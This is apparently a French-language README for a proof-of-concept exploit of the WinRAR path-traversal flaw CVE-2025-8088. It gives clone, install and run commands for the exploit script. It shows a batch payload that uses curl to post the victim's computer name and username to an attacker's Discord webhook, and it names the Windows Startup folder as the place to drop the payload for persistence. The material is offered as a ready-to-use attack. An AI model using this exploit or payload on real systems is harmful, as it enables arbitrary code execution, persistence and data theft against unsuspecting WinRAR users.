
Exploitation de la CVE Winrar avant 7.13 en utilisant plusieurs flux ADS sur un seul fichier (implémentation PDF personnalisée)
Un exploit de preuve de concept pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures. Cet outil crée une archive RAR malveillante qui intègre des charges utiles dans des flux de données alternatifs (ADS) avec une traversée de chemin, pouvant potentiellement conduire à une exécution de code arbitraire.
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Modifiez la charge utile pour appeler un webhook Discord :
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Remplacez YOUR_DISCORD_WEBHOOK_URL par votre véritable URL de webhook.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\